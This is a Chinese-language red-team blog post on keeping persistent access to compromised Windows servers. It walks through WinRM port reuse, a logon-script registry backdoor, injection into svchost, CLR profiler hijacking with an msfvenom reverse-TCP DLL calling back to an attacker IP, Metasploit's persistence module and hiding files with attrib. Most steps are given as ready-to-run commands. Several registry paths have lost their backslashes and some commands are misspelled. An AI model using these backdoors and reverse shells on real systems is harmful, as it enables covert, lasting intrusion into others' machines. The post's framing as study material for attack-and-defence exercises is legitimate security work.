『红蓝对抗』Windows权限维持(二)

日期：2022-05-16

作者：L-Center

介绍：一些常见的Windows权限维持方式。

0x00 前言

前提条件: 拿到目标服务器administrator权限。

环境：Windows Server2012/windows 7。

0x01 维持方式

1.1 端口复用

使用Windows的远程管理管理服务WinRM,结合HTTP.sys驱动自带的端口复用功能。

建立连接后，服务端程序占用极少系统资源，被控端不会在系统性能上有任何察觉。

在Windows 2012WinRM服务默认启动并监听了5985端口。

在Winsows 7或2008来说需要手动开启。

winrm qucikconfig -q 启动winrm(winsows 7或2008)netstat -ano 查看端口信息

输入如下命令实现端口复用：

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}winrm e winrm/config/listerner

再次查看端口信息5985端口仍然存在，在Winsows 7或2008版本中此端口为不开启状态。

使用winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

将winrm改为80端口。

再次查询便可查询不到5985端口信息。

客户端中将网络连接属性改为专用后cmd输入：

winrm quickconfig -qwinrm set winrm/config/Client @{TrustedHosts="*"}

设置完成后使用winrs命令，即可连接远程WinRM服务执行命令：

winrs -r:http://192.168.30.138 -u:administrator -p:Admin123 whoami获取结果后会直接退出。

使用cmd命令即可获取一个交互式的shell。

1.2 Logon scripts 后门

Logon Scripts优点是能够优先去执行，当用户登录时触发。

REG ADD "HKEY_CURRENT_USEREnvironment" /v UserInitMprLogonScript /t REG_SZ /d "C:UsersAdministratorDesktoptest2.exe"

重启或注销登录后得到shell。

1.3 进程注入

获得meterpreter的会话后，查看权限尝试获取哈希。

发现暂无权限，使用ps命令查看当前进程。

找到svchost.exe，是以system权限运行。

把后门注入到svchost.exe中，成功获取hash。

1.4 CLR 劫持

通过修改环境变量，使CLR作用于全局，从而劫持所有.net程序的启动。

CLR需要配置环境变量才可以完全劫持.net。

SETX COR_ENABLE_PROFILING 1 /M     设置环境变量为1SETX COR_PROFILER {GGUUGGUU-1234-1234-1234-AABBCCDDEEFF} /M

使用msf创建dll后门。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=444 -f dll > test.dll       32位msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=444 -f dll > test.dll   64位

创建完成后使用cmd修改注册表。

REG ADD "HKEY_CURRENT_USERSoftwareClassesCLSID{GGUUGGUU-1234-1234-1234-AABBCCDDEEFF}InProcServer32" /VE /T REG_SZ /D "C:WindowsSystem32test.dll" /F
REG ADD "HKEY_CURRENT_USERSoftwareClassesCLSID{GGUUGGUU-1234-1234-1234-AABBCCDDEEFF}InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F

修改完成后在cmd输入powershell后在kali监听得到shell。

1.5 Persistence 后门

Persistence是使用安装自动方式的持久性后门程序，可以利用它创建注册和文件。

先通过攻击获取一个meterpreter shell后输入：

run persistence -A -S -U -i 5 -p 4444 -r 192.168.30.130-A 自启动payload-S 系统登录自动加载payload-U/X 用户登录时自动启动-i 回连的时间间隔

执行结束后，获得了一个Persistence后门。重启kali后重新监听后得到shell。

1.6 attrib 命令隐藏

attrib是Windows自带命令行工具，用来显示或更改文件属性，使用起来比较简单方便。

-R 只读文件属性。-A 存档文件属性。-S 系统文件属性。-H 隐藏文件属性。-I 无内容索引文件属性。/S 处理当前文件夹及其所有子文件夹中的匹配文件。/D 也处理文件夹。/L 处理符号链接和符号链接目标的属性。

输入attrib +r +h +s将其隐藏。隐藏后只能通过attrib命令查看。

0x02 总结

要注意目标系统是32位还是64位，以此来生成对应的payload。

Windows操作系统的持久化后门还有很多，这里只是学习的一小部分。